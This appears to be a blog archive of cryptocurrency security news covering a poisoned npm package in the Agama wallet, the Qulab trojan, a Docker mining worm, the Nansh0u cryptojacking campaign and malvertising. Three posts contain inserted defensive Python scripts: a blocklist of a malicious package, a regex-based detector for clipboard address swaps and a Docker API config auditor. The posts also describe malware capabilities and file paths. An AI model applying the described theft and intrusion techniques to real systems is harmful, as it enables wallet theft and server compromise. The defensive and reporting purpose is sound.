Category Archives: cryptocurrency

[Results] CLB Super Holder Event

Greetings Cloudbric community!

Thank you for your interest in our CLB Super Holder event which has now come to an end.

On exactly June 17, at 4pm KST, the price of CLB sat at 10.4 KRW (approx. $0.0088 USD).

As mentioned, all eligible CLB holders will receive a guaranteed minimum of 5% cumulative bonus distributions (CLB and CLBK tokens) of their total CLB stake as long as they hold the minimum CLB token amount.

Please check the airdrop list to see whether your email was accepted under the guidelines.

Airdrop list

Please note that users that had already transferred CLB tokens prior to June 11th, 2019 at 2pm KST will receive an additional 200 CLB bonus airdrop to help mitigate any issues or confusion regarding wallet addresses and transfers.

The winners of the CLB Super Holder event will be issued their CLB tokens by June 24 and will receive their CLBK tokens after Klaytn’s main net launch. More details soon to come.


Make sure to follow us on our social media platforms (LinkedIn, Twitter, and Facebook) and our recently opened Telegram Announcement Channel for the latest updates!

The post [Results] CLB Super Holder Event appeared first on Cloudbric.

Cryptocurrency wallet GateHub hacked, nearly $10 million worth of Ripple (XRP) stolen

Cryptocurrency wallet service GateHub has warned that over 100 customers have had their ledger wallets hacked and funds stolen.

The post Cryptocurrency wallet GateHub hacked, nearly $10 million worth of Ripple (XRP) stolen appeared first on The State of Security.

Cryptocurrency startup Komodo hacks itself to protect its users’ funds from hackers

The cryptocurrency startup Komodo hacked itself to protect its users' funds and prevent attackers from stealing them by exploiting a flaw in its Agama wallet.

The story I’m going to tell you is amazing: the cryptocurrency startup Komodo hacked itself after discovering a backdoor in its Agama wallet.

Komodo’s Agama Wallet allows users to store KMD and BTC cryptocurrencies, but the presence of a backdoor posed a serious risk to them.

[Image: Komodo Agama Wallet]

Once it discovered the flaw, the company decided to exploit it itself to protect the funds, getting ahead of the attackers and moving the funds to a secure location.

“Today, Komodo were made aware of an issue with one of the libraries used by the Agama wallet, potentially putting some user funds at risk.” reads a blog post published by the company.

“After discovering the vulnerability, our Cyber Security Team used the same exploit to gain control of a lot of affected seeds and secure the funds at risk.” 

The company's experts moved around 8 million KMD and 96 BTC from the flawed Agama wallets to safe wallets under their control: RSgD2cmm3niFRu2kwwtrEHoHMywJdkbkeF (KMD) and 1GsdquSqABxP2i7ghUjAXdtdujHjVYLgqk (BTC).

Owners of wallets that have not been swept, or that hold assets other than KMD and BTC, must move all their funds from Agama to a new address as soon as possible. Komodo provided a list of safe wallets and other information on its support page.

Experts pointed out that the Verus version of the Agama wallet is not affected by this vulnerability; its latest version supports Komodo in both lite mode and native mode.

The backdoor in the Agama wallet app was discovered by the security team of npm, the JavaScript package registry.

“The attack was carried out by using a pattern that is becoming more and more popular; publishing a “useful” package (electron-native-notify) to npm, waiting until it was in use by the target, and then updating it to include a malicious payload.” reads the post published by the npm, Inc. security team.

The npm security team spotted a supply chain attack in which the attackers pushed a malicious update (version 1.1.6) of the electron-native-notify JavaScript library. It included code designed to steal cryptocurrency wallet seeds and other login passphrases.

“The GitHub user sawlysawly published this commit on Mar 8th which added electron-native-notify^1.1.5 as a dependency to the EasyDEX-GUI application (which is used as part of the Agama wallet).” continues the security team at npm.

The experts discovered that the attackers targeted the Agama cryptocurrency wallet, which used the EasyDEX-GUI application, which in turn loaded the now-malicious electron-native-notify library.

The backdoor was added to the electron-native-notify library on March 8, and it was included in the main Agama wallet on April 13, when Komodo released Agama version 0.3.5.

This means that users that logged in to any version of Agama wallet after 13 April likely had their wallet credentials compromised.

The npm experts also published a video showing how the vulnerable version of the Agama wallet sends the private seed associated with a wallet to a remote server in the background.

Komodo's experts used the same technique to transfer their clients' funds to a safe wallet before the attackers could steal them.
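The attack described above worked because EasyDEX-GUI declared electron-native-notify with a caret range (^1.1.5), so the malicious 1.1.6 release was pulled in automatically. The following Python script is an added example written for this article, not code from npm, Komodo or the Agama project: it walks a package-lock.json-style dependency map (a constructed excerpt, not the real Agama lockfile), flags any resolved package/version on a defender-maintained blocklist, and shows how npm caret ranges admit later patch releases. Only the package name and the versions ^1.1.5 and 1.1.6 come from the article; everything else is invented.

```python
import json
import re

# Constructed package-lock.json excerpt (not the real Agama/EasyDEX-GUI lockfile).
LOCKFILE_JSON = """
{
  "name": "example-gui",
  "lockfileVersion": 1,
  "dependencies": {
    "electron-native-notify": {"version": "1.1.6", "requires": {}},
    "left-pad": {"version": "1.3.0"},
    "some-lib": {
      "version": "2.0.0",
      "dependencies": {
        "electron-native-notify": {"version": "1.1.4"}
      }
    }
  }
}
"""

# Known-bad releases, as a defender would maintain them from advisories.
BLOCKLIST = {"electron-native-notify": {"1.1.6"}}


def parse_version(v):
    """Split 'MAJOR.MINOR.PATCH' into a tuple of ints (prerelease tags are ignored)."""
    m = re.match(r"^(\d+)\.(\d+)\.(\d+)", v)
    if not m:
        raise ValueError(f"unsupported version string: {v}")
    return tuple(int(x) for x in m.groups())


def caret_allows(range_spec, version):
    """Return True if an npm caret range such as '^1.1.5' admits `version`.
    For major >= 1, ^X.Y.Z means >= X.Y.Z and < (X+1).0.0; for ^0.Y.Z the minor is pinned too."""
    if not range_spec.startswith("^"):
        raise ValueError("only caret ranges are handled here")
    base = parse_version(range_spec[1:])
    ver = parse_version(version)
    if base[0] == 0:
        return ver[:2] == base[:2] and ver >= base
    return ver[0] == base[0] and ver >= base


def walk_dependencies(deps, path=()):
    """Yield (path, name, version) for every package in a nested lockfile map."""
    for name, meta in deps.items():
        here = path + (name,)
        yield here, name, meta["version"]
        nested = meta.get("dependencies")
        if nested:
            yield from walk_dependencies(nested, here)


def find_blocked(lock_text, blocklist):
    """Return 'a > b@version' strings for every resolved package that is on the blocklist."""
    lock = json.loads(lock_text)
    hits = []
    for path, name, version in walk_dependencies(lock.get("dependencies", {})):
        if version in blocklist.get(name, set()):
            hits.append(" > ".join(path) + "@" + version)
    return hits


if __name__ == "__main__":
    print(find_blocked(LOCKFILE_JSON, BLOCKLIST))      # the top-level 1.1.6 is flagged
    print(caret_allows("^1.1.5", "1.1.6"))             # True: the range let the bad release in
```

Pinning exact versions (or committing the lockfile and reviewing every change to it) closes the window this example demonstrates; the blocklist check is what you run after the fact, once an advisory names the poisoned release.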

Pierluigi Paganini

(SecurityAffairs – Komodo, hacking)

The post Cryptocurrency startup Komodo hacks itself to protect its users’ funds from hackers appeared first on Security Affairs.

Cryptocurrency Scammers Use Youtube For Promotion

Are you a cryptocurrency enthusiast who loves watching YouTube videos about Bitcoin and other cryptocurrencies? If so, be very alert about the YouTube channels you visit. YouTube, home to millions of content creators and online video consumers, is teeming with scammers and phishers. Google has for some time been actively taking down videos that host malicious links in the description, and even entire YouTube channels. However, YouTube campaigns promoting “Bitcoin generator” programs, which claim to be an easy way of creating bitcoins painlessly, continue to appear one after another.

The Bitcoin generator tool is nothing but an espionage program that steals user information from the computer upon execution. Videos promoting a bitcoin generator website named freebitco.in keep being re-uploaded on other YouTube channels once Google takes them down. Upon close inspection by researchers, the payload turned out to be the infamous Qulab espionage trojan, which installs itself on Windows under the directory %AppData%\amd64_microsoft-windows-netio-infrastructure as a file named msaudite.module.exe. Once installed, the payload can gather information from .wallet files (cryptocurrency wallets), collect text and save it to .txt files, and harvest browser persistent cookies and the login credentials cached by Steam, FileZilla and Discord. The Qulab trojan can also read the Windows clipboard and immediately replace its contents with different data, which is useful for hijacking cryptocurrency transfers.

Despite its name, Bitcoin generator supports the theft of cryptocurrencies other than BTC. It also monitors transactions involving the following currencies and services:

  • WMZ
  • WME
  • Qtum
  • Litecoin
  • Doge
  • Bytecoin
  • ZCash
  • WMX
  • VIA
  • QIWI
  • Graft
  • Dash
  • Bitcoin Gold
  • Yandex Money
  • WMU
  • Stratis
  • Neo
  • Ethereum
  • Lisk
  • Bitcoin Cash
  • Waves
  • WMR
  • Steam Trade Link
  • Monero
  • Electronium
  • Cardano

An extensive blog post on fumik0.com provides the full details of how Qulab performs its “magic” of stealing information, which is beyond the scope of this article. According to fumik0.com, a more advanced version of Qulab has capabilities beyond cryptocurrency wallet theft and the usual keylogging techniques, some of which are:

  • Browser stealing
  • Wallet Clipper
  • FTP creds
  • Discord / Telegram logs
  • Steam (Session / Trade links / 2FA Authenticator by abusing a third party software)
  • Telegram Bot through a proxy
  • Grabber

Qulab is a sophisticated trojan: it is built from a combination of modules written in Delphi, C, .NET and C++, which fumik0.com calls an exotic piece of malware. It follows the template set by AutoIT scripts (sold on the dark web), which automate trojan development through code reuse or code recycling. Fumik0.com opened a GitHub page with a working proof-of-concept that explains the fundamentals of AutoIT. “These libraries have been written to allow easy integration into your own scripts and are a very valuable resource for any programmer,” explained fumik0.com.

The authors of Qulab built a module into the malware that performs a “garbage collection” routine to evade detection. With its large set of features, Qulab uses a lot of memory, and that memory is then unavailable to the operating system and other programs. As memory reaches full utilization, Windows is forced to use the hard drive as virtual memory, which end users experience as a drop in the computer’s performance.
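The clipboard-switching behaviour described above (the “Wallet Clipper” feature) is one of the few Qulab actions that leaves a crisp signal on the endpoint: a copied address is replaced by a different address within a fraction of a second. The Python below is an added example written for this article, not code from fumik0.com or any product; it applies that rule to a constructed clipboard history. The event list, the two-second window and the simplified address patterns (legacy and bech32 bitcoin, Ethereum hex) are assumptions; the addresses are well-known documentation examples, not indicators from this article.

```python
import re
from datetime import datetime

# Simplified "looks like a cryptocurrency address" patterns (assumption: good
# enough for alerting, not for validating checksums).
ADDRESS_PATTERNS = [
    re.compile(r"^[13][a-km-zA-HJ-NP-Z1-9]{25,34}$"),   # legacy / P2SH bitcoin, base58
    re.compile(r"^bc1[02-9ac-hj-np-z]{25,62}$"),         # bech32 bitcoin, lowercase charset
    re.compile(r"^0x[0-9a-fA-F]{40}$"),                  # Ethereum
]


def looks_like_address(text):
    """True if the clipboard text matches one of the address patterns."""
    t = text.strip()
    return any(p.match(t) for p in ADDRESS_PATTERNS)


# Constructed clipboard history (timestamp, content); not real telemetry.
SAMPLE_EVENTS = [
    ("2019-06-01T10:00:00", "meeting notes for Monday"),
    ("2019-06-01T10:05:00", "1BvBMSEYstWetqTFn5Au4m4GFg7xJaNVN2"),      # user copies the payee
    ("2019-06-01T10:05:00.400", "3J98t1WpEZ73CNmQviecrnyiWrnqRhWNLy"),  # swapped 400 ms later
    ("2019-06-01T10:20:00", "0xde0B295669a9FD93d5F28D9Ec85E40f4cb697BAE"),
    ("2019-06-01T10:25:00", "bc1qar0srrr7xfkvy5l643lydnw9re59gtzzwf5mdq"),
]


def detect_clipboard_swaps(events, window_seconds=2.0):
    """Flag an address replaced by a *different* address within `window_seconds`.

    A human re-copying an address takes seconds; a clipper reacts in milliseconds,
    so a short window separates the two without needing process telemetry."""
    alerts = []
    prev_time, prev_text = None, None
    for ts, text in events:
        t = datetime.fromisoformat(ts)
        if (prev_text is not None
                and looks_like_address(prev_text) and looks_like_address(text)
                and prev_text.strip() != text.strip()
                and (t - prev_time).total_seconds() <= window_seconds):
            alerts.append({"at": ts, "original": prev_text.strip(), "replacement": text.strip()})
        prev_time, prev_text = t, text
    return alerts


if __name__ == "__main__":
    for a in detect_clipboard_swaps(SAMPLE_EVENTS):
        print(f"{a['at']}: clipboard address {a['original']} replaced by {a['replacement']}")
```

In production the event list would come from a clipboard monitor or EDR telemetry; the rule itself is what matters, and the same check doubles as user guidance: compare the pasted address against the one you copied before confirming a transfer.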

Related Resources:

Malicious YouTube ads used to mine cryptocurrency

Scranos Rootkit Auto-Subscribes Users To Selected Youtube Channels

Youtube Video Content Creators and Channel Subscribers Cautioned Of Malicious Posers


Compromised Docker Hosts Use Shodan for Cryptocurrency Mining

Researchers have detected a campaign in which compromised docker hosts use Shodan for carrying out cryptocurrency mining.

Hackers scan for Docker hosts with exposed APIs and use them for cryptocurrency mining by deploying malicious self-propagating Docker images that carry Monero miners and scripts that query Shodan to find further vulnerable targets. Researchers at Trend Micro discovered this campaign after a Docker image containing a Monero (XMR) cryptocurrency miner binary was deployed on one of their honeypots, set up as part of their efforts to monitor malicious activity aimed at containers. Sergiu Gatlan, security/tech reporter at Bleeping Computer, writes, “This type of attack is definitely nothing new seeing that researchers from Imperva discovered a similar campaign abusing the CVE-2019-5736 runc vulnerability to deploy cryptominers during early-March.”

“However, the hackers behind the attacks discovered by Trend Micro now also use scripts designed to scan for more vulnerable machines via Shodan search queries scanning for hosts with the 2375 port open and deploying more infected containers to the new targets after brute-forcing their way,” the Bleeping Computer report further says.

An independent security researcher who goes by the name Caprico, and researchers at Alibaba Cloud, have also observed this campaign. A blog post dated May 28, 2019 by the Alibaba Cloud researchers says, “Earlier this month, we detected a mining botnet that deploys malicious Docker containers on victim hosts by exploiting Docker’s remote API unauthorized Access vulnerability. We have named the botnet “Xulu” because it serves as username in the botnet’s mining.”

The blog post further says, “Xulu is not the first botnet case that aims at Docker; yet it differs from other botnets by not scanning other hosts by itself, instead it utilizes OSINT (open-source intelligence) technique and dynamically searches Shodan for lists of possible preys…It also placed its controlling server in the Tor network, which is probably an effort to hide the evil backstage manipulator of the botnet.”

The hackers behind the campaign used the exposed APIs to execute commands on the Docker hosts; these commands let them manage (start, stop or kill) containers and create new ones by deploying images from a Docker Hub repository under their control. The Trend Micro team zeroed in on a Docker Hub repository named zoolu2.

Alfredo Oliveira, Senior Threat Researcher at Trend Micro, writes, “By analyzing the logs and traffic data coming to and from the honeypot, we learned that the container came from a public (and thus accessible) Docker Hub repository named zoolu2. Upon checking and downloading the contents of the repository, we found that it contained nine images comprised of custom-made shells, Python scripts, configuration files, as well as Shodan and cryptocurrency-mining software binaries.”

The Trend Micro blog post further explains, “All the images in the zoolu2 repository contained the binary of a Monero (XMR) cryptocurrency miner. This piqued our interest since we’ve already had experience with containers being deployed as miners. In addition, some of the images contained a Shodan script that lists Docker hosts with exposed APIs, which we surmised was being used to identify suitable targets for further container distribution.”

Docker found and took down the repository containing the infected images, and Shodan also disabled the accounts used to access its API. But reports say that one malicious Docker image, which had already been downloaded more than 10,000 times, is still available. Reports also point out that the hackers had used another Docker Hub account to host infected containers; when that account was deactivated, they kept moving the containers to other accounts.

A GitHub user reporting this issue writes, “This image is a worm/botnet/whatever targeting unsecured Docker API instances (port tcp/2375)…It uses Tor to update its mining config and continuously scrapes Shodan for exposed Docker instances (with a hardcoded user/pass which I changed) to infect them as well. It also sets up an SSH server, with a hashed password for the root user (basically a backdoor account).”

The Bleeping Computer report explains how it all works. The malicious Docker images, which are deployed automatically by a script that looks for exposed APIs and remotely creates malicious containers using Docker commands, also start an SSH daemon that gives the hackers remote access. A custom-built Monero mining binary is launched in the background. Simultaneously, a scanning process driven by a third script looks for more victims through the Shodan API.

The report explains further, “The list of vulnerable hosts gets written to an iplist.txt file which is checked for duplicates, with all the new targets also being scanned for existing cryptocurrency-mining containers which will be deleted if found…The entire list of IP addresses is then sent to the campaign operators’ command-and-control servers “to deploy additional containers to other exposed hosts based on the IP list. It then loops to the beginning of the routine stated earlier with a new host.””
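The root cause on every victim in this campaign is the same: the Docker daemon's TCP API reachable without client-certificate authentication, conventionally on port 2375. The Python below is an added example written for this article, not code from Trend Micro, Alibaba Cloud or Docker; it audits a daemon.json for that weak setting next to a hardened one, and scans constructed `docker ps --format '{{json .}}'` output for containers whose image comes from a registry namespace you do not expect (the attackers' images came from a Docker Hub repository named zoolu2). The configuration keys `hosts`, `tlsverify`, `tlscacert`, `tlscert` and `tlskey` are real Docker daemon options; the addresses, file paths, container names and image tags are invented placeholders.

```python
import json

# Constructed daemon.json examples for this article (not the campaign's material).
WEAK_CONFIG = """
{ "hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"] }
"""

HARDENED_CONFIG = """
{
  "hosts": ["unix:///var/run/docker.sock", "tcp://10.0.0.5:2376"],
  "tlsverify": true,
  "tlscacert": "/etc/docker/ca.pem",
  "tlscert": "/etc/docker/server-cert.pem",
  "tlskey": "/etc/docker/server-key.pem"
}
"""


def audit_daemon_config(config_text):
    """Return a list of findings for a daemon.json; an empty list means nothing was flagged."""
    cfg = json.loads(config_text)
    findings = []
    tcp_hosts = [h for h in cfg.get("hosts", []) if h.startswith("tcp://")]
    if not tcp_hosts:
        return findings  # Unix socket only: the API is not reachable over the network
    tls_verify = bool(cfg.get("tlsverify", False))
    for h in tcp_hosts:
        host, _, port = h[len("tcp://"):].rpartition(":")
        if host in ("", "0.0.0.0", "::", "[::]"):
            findings.append(f"{h}: API listens on all interfaces")
        if port == "2375":
            findings.append(f"{h}: 2375 is the conventional plaintext API port")
        if not tls_verify:
            findings.append(f"{h}: TCP listener without tlsverify; anyone who can reach it controls the daemon")
    if tls_verify:
        for key in ("tlscacert", "tlscert", "tlskey"):
            if key not in cfg:
                findings.append(f"tlsverify is set but {key} is missing")
    return findings


# Constructed `docker ps --format '{{json .}}'` output, one JSON object per line.
# "zoolu2" is the repository named in the article; image and container names are placeholders.
SAMPLE_PS_LINES = [
    '{"ID": "a1b2c3d4e5f6", "Image": "nginx:1.17", "Names": "web"}',
    '{"ID": "0f9e8d7c6b5a", "Image": "zoolu2/example-image:latest", "Names": "quizzical_x"}',
    '{"ID": "123456abcdef", "Image": "registry.internal/app:3.2", "Names": "app"}',
]


def unexpected_images(ps_lines, allowed_namespaces):
    """Return (container name, image) pairs whose image is not from an allowed namespace."""
    hits = []
    for line in ps_lines:
        c = json.loads(line)
        image = c["Image"]
        # official library images such as "nginx:1.17" carry no namespace
        ns = image.split("/")[0] if "/" in image else "library"
        if ns not in allowed_namespaces:
            hits.append((c["Names"], image))
    return hits


if __name__ == "__main__":
    print(audit_daemon_config(WEAK_CONFIG))        # three findings
    print(audit_daemon_config(HARDENED_CONFIG))    # []
    print(unexpected_images(SAMPLE_PS_LINES, {"library", "registry.internal"}))
```

The hardened configuration binds to a single internal address on 2376 and requires mutual TLS; a firewall rule in front of the port is still worth having, because the audit above only sees what the daemon was told, not what the network allows.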

Also Read:

Cryptocurrency Mining Service Coinhive Set to Shut Down

Firefox to Offer Users Automatic Protection Against Cryptocurrency Mining Malware

Cyrptocoin Minning Malware On The Rise


Nansh0u Miner Attack 50000 MS-SQL, PHPMyAdmin Servers

Chinese hackers have secretly compromised more than 50,000 MS-SQL and PHPMyAdmin servers to mine TurtleCoin as part of a large-scale cryptojacking campaign called Nansh0u.

The campaign was discovered in early April and began on 26 February. It targeted servers around the world belonging to companies in different sectors, with more than 700 new victims a day.

According to the Guardicore Labs team which discovered the attacks, “During our investigation, we found 20 versions of malicious payloads, with new payloads created at least once a week and used immediately after their creation time,” and the hackers used “five attack servers and six connect-back servers”.

The Guardicore Labs team attributed this campaign to Chinese operators based on multiple indicators:

To compromise Windows MS-SQL and PHPMyAdmin servers, the hackers used a variety of tools, including a port scanner, an MS-SQL brute-force tool and a remote execution engine.

With the port scanner they found MS-SQL servers by checking whether the default MS-SQL ports were open. These servers were then fed automatically into the brute-force tool, which attempted to break into them with thousands of commonly used credentials.

Once they breached the servers, the Nansh0u operators infected them with 20 different versions of malicious payloads, using an MS-SQL script that downloads and runs the payload on the compromised machine. The privilege-escalation vulnerability CVE-2014-4113 was exploited to run the payloads with SYSTEM privileges on infected servers; each dropped payload is designed as a wrapper that carries out several actions.

As Guardicore researchers noted after analyzing the samples collected from the attack servers through the Guardicore Global Sensor Network (GGSN), the wrappers do the following:

• Execute the crypto-currency miner;
• Create persistency by writing registry run-keys;
• Protect the miner process from termination using a kernel-mode rootkit;
• Ensure the miner’s continuous execution using a watchdog mechanism.

The payloads use the XMRig and JCE miners with four mining pools to mine TurtleCoin, a privacy-oriented cryptocurrency with fast transactions in which all transactions are private unless deliberately made public.

On many of the infected servers, the payloads also dropped a kernel-mode driver with a random name, packed with VMProtect so that most AV engines do not recognize it.

The driver is signed with a certificate issued by Verisign to a Chinese company called Hangzhou Hootian Network Technology; the certificate has since been revoked. Its purpose is to “protect processes and prevent the user from closing” them.

[Figure: kernel-mode driver digital signature]
It also “contains additional rootkit functionality such as communicating with physical hardware devices and modifying internal Windows process objects that are unused by this particular malware.”

In addition, the kernel-mode driver, which ensures that the miner is not interrupted, supports virtually all Windows versions from Windows 7 to Windows 10, including beta versions.

The Guardicore Labs team has made a full list of IoCs for this campaign available, including payload hashes, IP addresses used in the attacks and mining pool domains.

In addition, a PowerShell script is provided that can be run on potentially infected computers to detect traces of the Nansh0u campaign, so that a compromised server can be identified.


Tips to Increase Your Bitcoin Security

Of all the cryptocurrencies available today, Bitcoin definitely is the most popular one. Investors are attracted by the potential value of this cryptocurrency. But let’s remember that whatever gets popular on the internet draws the attention of cybercriminals as well. Thus, Bitcoin, because of its popularity and also because of its potential value, does attract cybercriminals. Hence, it’s important that security measures are adopted to ensure and increase Bitcoin security. Here are some very basic tips that could help you increase your Bitcoin security…

Use a trusted web wallet

Agreed, web wallets are convenient and easy to access. They enhance your trading experience and make everything very easy for you, but at the same time many web wallets have serious security issues. Cybercriminals regularly seek to exploit web wallet vulnerabilities to get their hands on users’ cryptocurrency funds. So it would be good to opt only for trusted web wallets, those with a good reputation for security. You could also avoid web wallets altogether, or keep only small amounts in them so that you lose little in the event of a cyberattack.

Opting to keep your bitcoin in cold storage is good

Opting to keep your bitcoin in cold storage ensures better security. Cold storage is nothing but storing bitcoin offline as a security precaution. This could include storing bitcoins on a USB drive or other such data storage medium, on a paper wallet or by using an offline hardware wallet. As a best practice, keep on the server only the amount that is needed to cover anticipated withdrawals. That helps minimize the possibility of an intruder stealing your entire bitcoin reserve in one attack. When your bitcoin reserve is stored on a cold wallet, the transaction can be done only by using private keys that are stored in the cold wallet. Hence, even if your system is malware-infected, it won’t impact transactions that you do from your cold storage.

Always keep your private keys offline

This is important for all wallet owners. Always keep your private keys offline and also refrain from sharing them. The best thing would be to store your private keys on a separate offline device. This would help secure your bitcoins.

Refrain from keeping your cryptos in one place

If you could use separate wallets and not store all your bitcoins in one place, it would ensure better security. You could opt to keep what you need for anticipated spending or trading in your online wallet and the remaining bulk of your funds, as mentioned earlier, in your offline wallet. Whenever you transfer large amounts of bitcoins into your online wallet, make sure whatever remains after the transaction is done is transferred back to your cold wallet. This ensures better safety. Having your bitcoins saved in different locations ensures that you don’t end up losing everything in the eventuality of a hack.

Go for fragmented backups

You should always store copies of your backup in different secret locations. A fragmented backup, in which you divide the backup seed into fragments, could help secure your bitcoins. Your wallet gets an extra layer of security because any attacker targeting your bitcoins would have to find the fragments.

Other important tips that could help you secure your bitcoins include using a type 2 deterministic wallet (which uses a seed to deterministically create all future private keys) and, if possible, installing Linux on the online and offline computers you use for transferring bitcoin-related data (via a USB drive) from online to offline environments.

Such basic security measures, if adopted, could ensure better security for your bitcoins.

Related Resources:

Fake Fortnite App Installs Hidden Bitcoin Miner

Hackers Attack Crypto Exchange With Bitcoin-Stealing Malware

Hacker Compromised JavaScript Library to Steal Bitcoin funds

Hackers Steal Around $41 Million in Bitcoin from Binance


Bitcoin Rewards As Lures? Tale Of The New Generation Malvertising

Remember the malvertising campaigns of the early days, with adverts telling you that you are the nth visitor and have a prize to claim for being that coveted nth visitor to a website? These days there is little chance of seeing a Flash-based animated advert like that, since Google Chrome blocks scam-like adverts by default as part of the Google Safe Browsing initiative, which the Firefox browser also uses. The demise of malvertising does not end with the anaemic Flash-based variants, though: cybercriminals are now using bitcoin (or rather, people’s desire for it) to lure people to dodgy websites under their control.

Imagine a malvertising website offering its visitors $30 worth of bitcoin: not huge, but with enough “visits” it might let someone afford something on eBay or an Amazon gift card. However, the website installs keyloggers, banking trojans or ransomware that will harm the victim later. Another, similar but unrelated set of websites offers referral prizes in Ethereum (another cryptocurrency alternative to bitcoin), with one site claiming that a user who refers 1,000 visitors will earn $750 worth of Ethereum.

Both websites offer a download they call “Bitcoin Collector”, which claims to be an easy mining program for Windows that will provide “free Bitcoins” but instead makes the computer mine cryptocurrency for the author at the user’s expense. One of the most common trojans in this category is named BotCollector.exe and usually arrives in a .zip file downloaded from a malvertising website.

“When you execute the included BotCollector.exe, it will launch a program called ‘Freebitco.in – Bot’ that does not appear to do much. In reality, though, this is a Trojan that pretends to be a bitcoin generator but simply launches a malware payload. It does this by copying a file at geobaze\patch\logo.png to logo.exe and executing it (planting itself deep into the Windows operating system)”, explained Lawrence Abrams of Bleepingcomputer.com.

BotCollector.exe was previously observed with different behavior: it used to be the main payload of the ransomware named “Marozka Tear”. Being unsophisticated, Marozka Tear’s author used a free public Gmail account (india2lock@gmail.com) for victims to contact him/her about the ransom payment, instead of a sophisticated “shopping cart” for collecting payments. The Bleeping Computer team stopped the ransomware from being profitable by releasing a free decryptor that reverses the encryption of user files without paying Marozka Tear’s author.

At the time of writing, the two hidden payloads of the new BotCollector variant have not yet been fully dissected by the BleepingComputer team. Initial checks show it is comparable to full-blown espionage malware: it can record keystrokes, take screenshots, capture browser history, send user files to its author and even copy the contents of a crypto wallet.

Also Read:

Hackers Steal Around $41 Million in Bitcoin from Binance

South Korean Bitcoin Exchange Bithumb Hacked

Hacker Stole 200+ Bitcoin from Electrum Wallet

Is Bitcoin Just A Bubble That Will Burst In 2019

Using BitCoins: The Basics


Police seized Bestmixer, the mixing service washed at least $200 million in a year

European law enforcement seized and shut down Bestmixer.io for reportedly laundering over $200 million in cryptocurrency.

This week Europol dealt another blow to cybercrime: the European police, along with the Dutch Fiscal Information and Investigation Service (FIOD) and the Luxembourg authorities, shut down Bestmixer.io, one of the world’s leading cryptocurrency mixing services.

A mixing service (aka cryptocurrency tumbler) mixes potentially identifiable or ‘tainted’ cryptocurrency funds with others, making it hard to trace the funds back to their original source. Operators of mixing services keep a fee from the original funds.

“A mixing service will cut up a sum of Bitcoins into hundreds of smaller transactions and mixes different transactions from other sources for obfuscation and will pump out the input amount, minus a fee, to a certain output address. Mixing Bitcoins that are obtained legally is not a crime but, other than the mathematical exercise, there is no real benefit to it.” reads a blog post published by McAfee.

“The legality changes when a mixing service advertises itself as a success method to avoid various anti-money laundering policies via anonymity. This is actively offering a money laundering service.”

Back in 2018, FIOD launched an investigation, with the support of the security firm McAfee, that led to the seizure of six servers in the Netherlands and Luxembourg.


“Today, the Dutch Fiscal Information and Investigation Service (FIOD), in close cooperation with Europol and the authorities in Luxembourg, clamped down on one of the world’s leading cryptocurrency mixing service Bestmixer.io.” reads the press release published by the Europol.


Bestmixer.io was launched in May 2018 and offered mixing services for bitcoin, bitcoin cash and litecoin.

Immediately after the launch, the police began investigating the activity of the mixing service.

The numbers behind the service are impressive: it reached a turnover of at least $200 million (approx. 27,000 bitcoins) in 12 months. Of course, the mixing service ensured the total anonymity of its customers.

“The investigation so far into this case has shown that many of the mixed cryptocurrencies on Bestmixer.io had a criminal origin or destination,” continues the Europol. “In these cases, the mixer was probably used to conceal and launder criminal flows of money.”

The Dutch FIOD is investigating data related to all the interactions on this service in the past year. Investigators obtained IP-addresses, transaction details, bitcoin addresses and chat messages associated with the interactions.

“This information will now be analysed by the FIOD in cooperation with Europol and intelligence packages will be shared with other countries.” concludes the press release.


If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

Thank you

Pierluigi Paganini

(SecurityAffairs – Bestmixer .io, cybercrime)

The post Police seized Bestmixer, the mixing service washed at least $200 million in a year appeared first on Security Affairs.

Banking Trojan Infections Dominated In Q1 2019

Kaspersky Lab, the research arm of the antivirus vendor Kaspersky, has revealed that the first quarter of 2019 saw banking trojan cases double globally compared to the last quarter of 2018. Cybercriminals have switched their focus to banking trojans after the shutdown of the very popular Coinhive cryptojacking service in March 2019. With the focus on profit, ransomware infections are slowly declining, while operating system mitigations are reducing the infection vectors available to cryptocurrency malware.

“In Q1 2019, Kaspersky Lab detected a 58% increase in modifications of banking Trojan families, used in attacks on 312,235 unique users. Banking Trojans grew not only in the number of different samples detected, but their share of the threat landscape increased as well. In Q4 2018, mobile banking Trojans accounted for 1.85% of all mobile malware; in Q1 2019, their share reached 3.24%,” explained Victor Chebyshev, Kaspersky’s Lead of Research Development team.

Banking trojans of 2019 are highly modular, with new features added on-the-fly by their respective authors. Kaspersky detected that for the first quarter of 2019 alone, 29,841 variants of banking trojans were discovered. That is a sizable increase from just 18,501 discovered variants in the 4th quarter of 2018.

“As is customary, first place in the Top 20 for Q1 went to the DangerousObject.Multi.Generic verdict (54.26%), which we use for malware detected using cloud technologies. Cloud technologies are deployed when the antivirus databases lack data for detecting a piece of malware, but the company’s cloud already contains information about the object. This is basically how the latest malicious programs are detected,” added Chebyshev.

Kaspersky expects the mobile platform to be the segment hit hardest, because users today do more of their computing on mobile devices than on full-fledged computers.

“The rapid rise of mobile financial malware is a troubling sign, especially since we see how criminals are perfecting their distribution mechanisms. For example, a recent tendency is to hide the banking Trojan in a dropper – the shell that is supposed to fly to the device under the security radar, releasing the malicious part only upon arrival,” concluded Chebyshev.

Also Read:

The All-New Kronos Banking Trojan Discovered

Multimedia Editing Software Hacked to Spread Banking Trojan

Redaman Banking Trojan of 2015 Resurrects, Targets Russian Email Users

How Protect Your Android Device From The Mobile Banking Trojan

The post Banking Trojan Infections Dominated In Q1 2019 appeared first on .

Cyber News Rundown: Banking Trojan Closes Ohio Schools


Banking Trojan Shuts Down Ohio School District

After the discovery of the banking Trojan known as Trickbot, an Ohio school district was forced to cancel school since they were unable to fully disinfect the networks before classes resumed the following Monday. Preliminary reports have concluded that no students were responsible for the attack, as it appears to have started its data-gathering on a computer belonging to the district treasurer’s office. In order for classes to resume normally, the IT staff for the district had to re-format nearly 1,000 affected computers. 

GetCrypt Spreading Through RIG Exploit Kits

Another ransomware variant, GetCrypt, has been spotted in the wild that spreads itself across systems by redirecting visitors to a compromised website to a separate page hosting an exploit kit. After checking for several Eastern European languages, the ransomware begins encrypting all files on the system and displays a standard ransom note. In addition to removing all available shadow copies from the computer, GetCrypt also appends all encrypted files with a randomized, four-character string based on the CPUID of the device itself.

Google Assistant Logs All Online Purchases

